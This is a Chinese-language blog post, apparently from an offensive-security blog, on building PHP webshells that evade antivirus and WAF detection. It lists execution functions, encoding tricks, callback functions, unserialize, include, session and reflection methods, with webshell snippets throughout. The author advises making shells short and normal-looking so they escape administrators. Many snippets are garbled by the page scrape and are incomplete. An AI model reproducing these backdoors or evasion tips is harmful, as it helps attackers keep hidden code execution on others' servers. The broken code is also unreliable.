全方位构造免杀 webshell 小结 [一]

0x01 基于各类常规命令和代码执行函数的花样变形[如,拆分重组,动态执行,以此来躲避静态特征检测],不过像有些高危函数默认就会被运维们禁掉,甚至高版本的php默认已经不让执行[如,php7],万一再开了安全模式,就又有点儿费劲了

php中一些常见的执行类型函数:

system()
exec()
shell_exec()
passthru()
proc_open()
`` 反引号执行系统命令
...

$cmd

";?>

fanyinhao.png

"$_POST[fun]");$a = "${ $arr["a"]( $_POST[code])}"; ?>

0x02 利用各类编码来消除静态特征,以此来扰乱waf识别流量,说实话这种还是相对比较容易被检测到

利用base64编码,这种编码可能是各类webshell中用的最频繁的一种,如,weevely中默认就是用的base64,所以免杀性相对较好,另外还有诸如各类免杀大马,过waf菜刀等等……

利用rot13编码,也用的比较频繁,关于各类编码的内部工作细节,请仔细阅读开发手册

利用url编码以及自定义加解密实现的免杀,其实也有点儿类似编码,因为是自己设置的加密,所以只有通信的双方知道,这样一来waf就很难在未解密数据中识别出webshell特征,不过人眼还是很容易就看出来的

不实用

利用ASCII码转换,消除特征,如chr...比较简单,也比较原始,这里就不多说了,实战也不推荐用,肉眼扫一下就看出来了

不实用

利用 xor [异或] ~[取反] 注入此类的位运算,实战中依然不推荐,只要是个正常人基本都能看出来这是啥,实际中记得先把下面的url编码解码

 
  
   
    
     
    
   
   
  
 数组特性,这个就更不推荐了,看似花哨,但正常的项目代码中是根本不可能出现这些东西的,很明显,这无疑是在故意告诉别人,你来了,然后这就是你的webshell请删除,如果单单只是想免杀,回调和反序列也许会更好,相对比价隐蔽,完全不用这么招摇过市的搞 
 
 
  
   
    
     
    
   
   
  
 0x03 利用一些特殊的web服务器及脚本自身配置来bypass waf 
 利用短格式来实现免杀,前提需要目标的php配置已经事先开启短格式支持[php.ini有对应的开关],不过一般默认都是没开的,确实比较鸡肋,不实用
short_open_tag = On 
 
  
   
    
     
    
   
   
  
 0x04 利用各种脚本语言自身的语言特性灵活隐匿webshell,个人非常推荐的方式,扩展空间也非常的大,较适合用于实战: 
 具有回调特性的函数其实还有非常多,这里只是简单地列出了一部分,可挖掘的潜力还比较大,大家可对着手册自行深入研究,利用回调的好处除了免杀之外,还有就是可以很方便我们直接把我们的shell插到目标的正常代码中,让其变得更加难以追踪,关于webshell隐藏的更多内容,大家可参考我的博客,那里很久之前稍微总结了一些:
 
  
 
  
   
    
     
    
   
   
  
 
 
  
   
    
     
    
   
   
  
 1,$_REQUEST['req']=>2);uksort($arr,$fun);?>
 
  
   
    
     
    
   
   
  
 uasort(base64_decode($_POST['fun']));?>
 
  
   
    
     
    
   
   
  
 
 
  
   
    
     
    
   
   
  
 
 
  
   
    
     
    
   
   
  
 
 
  
   
    
     
    
   
   
  
 
 
  
   
    
     
    
   
   
  
 利用序列化与反序列化免杀,简单来讲原理类似反序列化漏洞,因为成员变量可控,在析构的时造成的代码执行: 
 code);
    }
}
$ser = $_GET['serdata'];
unserialize($ser);
 
 序列化后的数据 
 
 
  
   
    
     
    
   
   
  
 编码配合动态函数: 
 $fun);
$a = "${ $arr['a']($code)}";
?>
 
  
   
    
     
    
   
   
  
 利用包含特性,也是一种相对比较原始的waf bypass方式: 
 
 
  
   
    
     
    
   
   
  
 利用session机制免杀: 
 
 
  
   
    
     
    
   
   
  
 利用php反射特性免杀 
 invokeArgs(array(base64_decode($_POST[c])));?>
 
  
   
    
     
    
   
   
  
 0x05 后话 
 上面的给出的这些shell,正常来讲,都不会活很久,可能有的早已经死了,像各种各种编码它本身就是敏感特征
因为自己目前还在外地,完整环境也不在身边,就没一一给大家进行实际的免杀测试了,不过这并不是目的
这次主要还想跟大家好好梳理一些可以用来免杀的特性,大家可以再单独针对这些特性去深入研究,达到灵活变通才是最终目的
实战中,假设某一个特性不行,不妨同时几个特性配合着一起来,往往会有不错的效果
说实话,如果不针对这些带有特殊特性的函数下手,只是简单的见招拆招,基于此思路衍生出来的shell,waf是很难做到主动识别的
所以,大家大可不用担心这些shell被杀,核心还是灵活掌握这些最基本的免杀思路
没事儿还是非常建议大家多去翻翻php的开发手册,里面还有很多没被发觉出来的宝贝,也期待能和大家一起多交流
如果真的是深刻理会了,像什么过waf菜刀自然就很容易理解了,其实现在看来还是蛮简单的
自己拿wireshark跑跑POST包就能看到的很清楚了,然后再针对杀的点逆向一下即可
其实,随着php快速的升级迭代,有些特性可能并不能适用于所有php版本,这也再正常不过
以前的没有了肯定还会有更好的替代品,还是那句话,思路比任何东西都要重要
可能大家也发现了,这次基本全部都是在说php,并没有涉及到asp或者aspx,不过其中有些脚本特性都是相通的,大家触类旁通就好了
实际使用中建议不要用的过于花哨,没错,也许你确实是躲避了waf,但却没逃过运维大叔们的法眼,所以,越不显眼,代码越正常,长度越短越好
当然啦,方法肯定不止这么点儿,期待能和大家一起多交流
始终坚信,授人以鱼不如授人以渔,^_^ 未完,待续……
 
 欢迎大家多多关注 我的博客 或者 扫码关注个人微信公众号 'apt攻防指南'

全方位构造免杀 webshell 小结 [一]

你可能感兴趣的:(全方位构造免杀 webshell 小结 [一])